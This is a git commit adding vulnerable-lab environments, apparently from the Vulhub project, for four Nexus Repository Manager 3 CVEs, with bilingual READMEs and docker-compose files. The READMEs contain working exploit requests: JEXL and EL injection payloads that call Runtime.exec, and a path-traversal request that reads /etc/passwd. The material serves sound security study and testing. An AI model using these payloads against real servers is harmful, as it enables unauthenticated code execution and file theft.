first commit

nexus/CVE-2019-7238/README.md

@@ -0,0 +1,58 @@
+# Nexus Repository Manager 3 Unauthenticated Remote Code Execution (CVE-2019-7238)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Nexus Repository Manager is a repository manager that organizes, stores and distributes artifacts needed for development.
+
+In the version <= 3.14.0, insufficient access control and JEXL expression injection issue have been discovered in Nexus Repository 3 that allows for an unauthenticated attacker to execute arbitrary code by crafting a malicious request to Nexus Repository.
+
+References:
+
+- https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019
+- https://xz.aliyun.com/t/4136
+- https://www.anquanke.com/post/id/171116
+- http://commons.apache.org/proper/commons-jexl/
+
+## Vulnerable environment
+
+Execute following command to start a Nexus Repository Manager version 3.21.1:
+
+```
+docker compose up -d
+```
+
+After the server is started, browse `http://your-ip:8081` to see the home page of Nexus. Login the admin panel with account `admin:admin123` and finish the initialize wizard.
+
+Then, upload a JAR package through maven-releases:
+
+![](1.png)
+
+To exploit this issue, Nexus Repository should have at least one package.
+
+## Exploit
+
+Send following request to execute `touch /tmp/success` command, no authentication needed:
+
+```
+POST /service/extdirect HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0
+Accept: */*
+Content-Type: application/json
+X-Requested-With: XMLHttpRequest
+Content-Length: 368
+Connection: close
+
+{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":
+[{"property":"repositoryName","value":"*"},{"property":"expression","value":"233.class.forName('java.lang.Runtime').getRuntime().exec('touch /tmp/success')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":8}
+```
+
+As you can see, `/tmp/success` is executed:
+
+![](2.png)
+
+The principle is that the JEXL expression in the expression position is executed, please refer to the documentation for details.
+
+Use BCEL classloader to archive printable response:
+
+![](3.png)

nexus/CVE-2019-7238/README.zh-cn.md

@@ -0,0 +1,54 @@
+# Nexus Repository Manager 3 远程命令执行漏洞（CVE-2019-7238）
+
+Nexus Repository Manager 3 是一款软件仓库，可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中，存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能，而这处功能存在未授权访问漏洞，将可以导致任意命令执行漏洞。
+
+参考链接：
+
+- https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019
+- https://xz.aliyun.com/t/4136
+- https://www.anquanke.com/post/id/171116
+- http://commons.apache.org/proper/commons-jexl/
+
+## 环境搭建
+
+执行如下命令启动Nexus Repository Manager 3.14.0：
+
+```
+docker compose up -d
+```
+
+等待一段时间环境才能成功启动，访问`http://your-ip:8081`即可看到Web页面。
+
+使用账号密码`admin:admin123`登录后台，然后在maven-releases下随便上传一个jar包：
+
+![](1.png)
+
+触发该漏洞，必须保证仓库里至少有一个包存在。
+
+## 漏洞复现
+
+接口没有校验权限，所以直接发送如下数据包，即可执行`touch /tmp/success`命令：
+
+```
+POST /service/extdirect HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0
+Accept: */*
+Content-Type: application/json
+X-Requested-With: XMLHttpRequest
+Content-Length: 368
+Connection: close
+
+{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":
+[{"property":"repositoryName","value":"*"},{"property":"expression","value":"233.class.forName('java.lang.Runtime').getRuntime().exec('touch /tmp/success')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":8}
+```
+
+可见，`/tmp/success`已成功执行：
+
+![](2.png)
+
+原理是expression位置的JEXL表达式被执行，详情可阅读参考文档。
+
+利用classloader加载字节码即可获得回显：
+
+![](3.png)

nexus/CVE-2019-7238/docker-compose.yml

@@ -0,0 +1,7 @@
+version: '3'
+services:
+ web:
+   image: vulhub/nexus:3.14.0
+   ports:
+    - "8081:8081"
+    - "5005:5005"

nexus/CVE-2020-10199/README.md

@@ -0,0 +1,63 @@
+# Nexus Repository Manager 3 Authenticated Remote Code Execution (CVE-2020-10199)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Nexus Repository Manager is a repository manager that organizes, stores and distributes artifacts needed for development.
+
+In the version <= 3.21.1, a EL injection vulnerability has been discovered that allows for an attacker with any type of account on Nexus Repository to execute arbitrary code by crafting a malicious request to Nexus Repository.
+
+References:
+
+- https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
+- https://github.com/threedr3am/learnjavabug/blob/93d57c4283/nexus/CVE-2020-10199/README.md
+- https://github.com/jas502n/CVE-2020-10199
+
+## Vulnerable environment
+
+Execute following command to start a Nexus Repository Manager version 3.21.1:
+
+```
+docker compose up -d
+```
+
+After the server is started, browse `http://your-ip:8081` to see the home page of Nexus. Login the admin panel with account `admin:admin` and finish the initialize wizard.
+
+## Exploit
+
+Copy your cookie and CSRF token then send following request:
+
+```
+POST /service/rest/beta/repositories/go/group HTTP/1.1
+Host: 127.0.0.1:8081
+Content-Length: 203
+X-Requested-With: XMLHttpRequest
+X-Nexus-UI: true
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+NX-ANTI-CSRF-TOKEN: [csrf-token]
+Content-Type: application/json
+Accept: */*
+Origin: http://127.0.0.1:8081
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Referer: http://127.0.0.1:8081/
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: NX-ANTI-CSRF-TOKEN=[csrf-token]; NXSESSIONID=[session-id]
+Connection: close
+
+{
+  "name": "internal",
+  "online": true,
+  "storage": {
+    "blobStoreName": "default",
+    "strictContentTypeValidation": true
+  },
+  "group": {
+    "memberNames": ["$\\A{233*233*233}"]
+  }
+}
+```
+
+![](1.png)
+
+Refer to <https://github.com/jas502n/CVE-2020-10199>, use EL expression payload `$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}` to execute command `touch /tmp/success`.

nexus/CVE-2020-10199/README.zh-cn.md

@@ -0,0 +1,61 @@
+# Nexus Repository Manager 3 远程命令执行漏洞（CVE-2020-10199）
+
+Nexus Repository Manager 3 是一款软件仓库，可以用来存储和分发Maven、NuGET等软件源仓库。其3.21.1及之前版本中，存在一处任意EL表达式注入漏洞，具有任意用户权限的攻击者可以在目标服务器上执行任意命令。
+
+参考链接：
+
+- https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
+- https://github.com/threedr3am/learnjavabug/blob/93d57c4283/nexus/CVE-2020-10199/README.md
+- https://github.com/jas502n/CVE-2020-10199
+
+## 漏洞环境
+
+执行如下命令启动Nexus Repository Manager 3.21.1：
+
+```
+docker compose up -d
+```
+
+等待一段时间环境才能成功启动，访问`http://your-ip:8081`即可看到Web页面。
+
+该漏洞需要至少普通用户身份，所以我们需要使用账号密码`admin:admin`登录后台。
+
+## 漏洞复现
+
+登录后，复制当前Cookie和CSRF Token，发送如下数据包，即可执行EL表达式：
+
+```
+POST /service/rest/beta/repositories/go/group HTTP/1.1
+Host: 127.0.0.1:8081
+Content-Length: 203
+X-Requested-With: XMLHttpRequest
+X-Nexus-UI: true
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+NX-ANTI-CSRF-TOKEN: [csrf-token]
+Content-Type: application/json
+Accept: */*
+Origin: http://127.0.0.1:8081
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Referer: http://127.0.0.1:8081/
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: NX-ANTI-CSRF-TOKEN=[csrf-token]; NXSESSIONID=[session-id]
+Connection: close
+
+{
+  "name": "internal",
+  "online": true,
+  "storage": {
+    "blobStoreName": "default",
+    "strictContentTypeValidation": true
+  },
+  "group": {
+    "memberNames": ["$\\A{233*233*233}"]
+  }
+}
+```
+
+![](1.png)
+
+参考<https://github.com/jas502n/CVE-2020-10199>，使用表达式`$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}`即可成功执行任意命令。

nexus/CVE-2020-10199/admin.password

@@ -0,0 +1 @@
+admin

nexus/CVE-2020-10199/docker-compose.yml

@@ -0,0 +1,8 @@
+version: '3'
+services:
+ web:
+   image: vulhub/nexus:3.21.1
+   ports:
+    - "8081:8081"
+   volumes: 
+    - ./admin.password:/nexus-data/admin.password

nexus/CVE-2020-10204/README.md

@@ -0,0 +1,55 @@
+# Nexus Repository Manager 3 Authenticated Remote Code Execution (CVE-2020-10204)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Nexus Repository Manager is a repository manager that organizes, stores and distributes artifacts needed for development.
+
+In the version <= 3.21.1, a EL injection vulnerability has been discovered that allows for an attacker with an administrative account on Nexus Repository to execute arbitrary code by crafting a malicious request to Nexus Repository. This issue is patch bypass of CVE-2018-16621.
+
+References:
+
+- https://support.sonatype.com/hc/en-us/articles/360044356194-CVE-2020-10204-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
+- https://github.com/threedr3am/learnjavabug/blob/93d57c4283/nexus/CVE-2020-10204/README.md
+- https://github.com/jas502n/CVE-2020-10199
+
+## Vulnerable environment
+
+Execute following command to start a Nexus Repository Manager version 3.21.1:
+
+```
+docker compose up -d
+```
+
+After the server is started, browse `http://your-ip:8081` to see the home page of Nexus. Login the admin panel with administrator account `admin:admin` and finish the initialize wizard.
+
+## Exploit
+
+Copy your cookie and CSRF token then send following request:
+
+```
+POST /service/extdirect HTTP/1.1
+Host: your-ip
+Content-Length: 223
+X-Requested-With: XMLHttpRequest
+X-Nexus-UI: true
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+NX-ANTI-CSRF-TOKEN: [csrf-token]
+Content-Type: application/json
+Accept: */*
+Origin: http://192.168.1.3:8081
+Referer: http://192.168.1.3:8081/
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: NX-ANTI-CSRF-TOKEN=[csrf-token]; NXSESSIONID=[sessionid]
+Connection: close
+
+{"action":"coreui_User","method":"update","data":[{"userId":"admin","version":"2","firstName":"admin","lastName":"User","email":"admin@example.org","status":"active","roles":["nxadmin$\\B{233*233}"]}],"type":"rpc","tid":11}
+```
+
+As you can see, EL expression `233*233` is executed:
+
+![](1.png)
+
+Refer to <https://github.com/jas502n/CVE-2020-10199>, use EL expression payload `$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}` to execute command `touch /tmp/success`:
+
+![](2.png)

nexus/CVE-2020-10204/README.zh-cn.md

@@ -0,0 +1,50 @@
+# Nexus Repository Manager 3 远程命令执行漏洞（CVE-2020-10204）
+
+Nexus Repository Manager 3 是一款软件仓库，可以用来存储和分发Maven、NuGET等软件源仓库。其3.21.1及之前版本中，存在一处任意EL表达式注入漏洞，具有管理员权限的攻击者可以在目标服务器上执行任意命令。这个漏洞是CVE-2018-16621的绕过。
+
+参考链接：
+
+- https://support.sonatype.com/hc/en-us/articles/360044356194-CVE-2020-10204-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
+- https://github.com/threedr3am/learnjavabug/blob/93d57c4283/nexus/CVE-2020-10204/README.md
+
+## 漏洞环境
+
+执行如下命令启动Nexus Repository Manager 3.21.1：
+
+```
+docker compose up -d
+```
+
+等待一段时间环境才能成功启动，访问`http://your-ip:8081`即可看到Web页面。
+
+该漏洞需要访问更新角色或创建角色接口，所以我们需要使用账号密码`admin:admin`登录后台。
+
+## 漏洞复现
+
+登录后台后，复制当前Cookie和CSRF Token，发送如下数据包，即可执行EL表达式：
+
+```
+POST /service/extdirect HTTP/1.1
+Host: your-ip
+Content-Length: 223
+X-Requested-With: XMLHttpRequest
+X-Nexus-UI: true
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+NX-ANTI-CSRF-TOKEN: [csrf-token]
+Content-Type: application/json
+Accept: */*
+Origin: http://192.168.1.3:8081
+Referer: http://192.168.1.3:8081/
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: NX-ANTI-CSRF-TOKEN=[csrf-token]; NXSESSIONID=[session-id]
+Connection: close
+
+{"action":"coreui_User","method":"update","data":[{"userId":"admin","version":"2","firstName":"admin","lastName":"User","email":"admin@example.org","status":"active","roles":["nxadmin$\\B{233*233}"]}],"type":"rpc","tid":11}
+```
+
+![](1.png)
+
+参考<https://github.com/jas502n/CVE-2020-10199>，使用表达式`$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}`即可成功执行任意命令：
+
+![](2.png)

nexus/CVE-2020-10204/admin.password

@@ -0,0 +1 @@
+admin

nexus/CVE-2020-10204/docker-compose.yml

@@ -0,0 +1,9 @@
+version: '3'
+services:
+ web:
+   image: vulhub/nexus:3.21.1
+   ports:
+    - "8081:8081"
+    - "5005:5005"
+   volumes: 
+    - ./admin.password:/nexus-data/admin.password

nexus/CVE-2024-4956/README.md

@@ -0,0 +1,46 @@
+# Nexus Repository Manager 3 Unauthenticated Path Traversal (CVE-2024-4956)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Nexus Repository Manager is a repository manager that organizes, stores and distributes artifacts needed for development.
+
+A path traversal vulnerability has been discovered in Nexus Repository 3 before version 3.68.1, the vulnerability allows for an attacker to craft a URL to return any file as a download, including system files outside of Nexus Repository application scope, without any authentication.
+
+References:
+
+- <https://support.sonatype.com/hc/en-us/articles/29416509323923-CVE-2024-4956-Nexus-Repository-3-Path-Traversal-2024-05-16>
+
+## Vulnerable environment
+
+Execute following command to start a Nexus Repository Manager version 3.68.0:
+
+```
+docker compose up -d
+```
+
+After the server is started, browse `http://your-ip:8081` to see the home page of Nexus.
+
+## Exploit
+
+Just like SpringMVC CVE-2018-1271 from Orange Tsai's [share](https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf), Jetty's `URIUtil.canonicalPath()` also treats the empty string as a directory which is the root cause of this vulnerability:
+
+![](1.png)
+
+Simply send following request to reproduce the issue:
+
+```
+GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
+Host: localhost:8081
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+
+
+```
+
+As you can see, `/etc/passwd` has been exposed directly:
+
+![](2.png)

nexus/CVE-2024-4956/README.zh-cn.md

@@ -0,0 +1,44 @@
+# Nexus Repository Manager 3 未授权目录穿越漏洞（CVE-2024-4956）
+
+Nexus Repository Manager 3 是一款软件仓库，可以用来存储和分发Maven、NuGET等软件源仓库。
+
+其3.68.0及之前版本中，存在一处目录穿越漏洞。攻击者可以利用该漏洞读取服务器上任意文件。
+
+参考链接：
+
+- <https://support.sonatype.com/hc/en-us/articles/29416509323923-CVE-2024-4956-Nexus-Repository-3-Path-Traversal-2024-05-16>
+
+## 漏洞环境
+
+执行如下命令启动一个Nexus Repository Manager version 3.68.0 版本服务器：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8081`即可看到Nexus的默认页面。
+
+## 漏洞复现
+
+与Orange Tsai在[Blackhat US 2018](https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf)分享的SpringMVC CVE-2018-1271漏洞类似，Jetty的`URIUtil.canonicalPath()`函数也将空字符串认为是一个合法目录，导致了该漏洞的产生：
+
+![](1.png)
+
+发送如下请求来复现漏洞：
+
+```
+GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
+Host: localhost:8081
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+
+
+```
+
+可见，`/etc/passwd`已被成功读取：
+
+![](2.png)

nexus/CVE-2024-4956/admin.password

@@ -0,0 +1 @@
+admin

nexus/CVE-2024-4956/docker-compose.yml

@@ -0,0 +1,9 @@
+version: '3'
+services:
+ web:
+   image: vulhub/nexus:3.68.0
+   ports:
+    - "8081:8081"
+    - "5005:5005"
+   volumes: 
+    - ./admin.password:/nexus-data/admin.password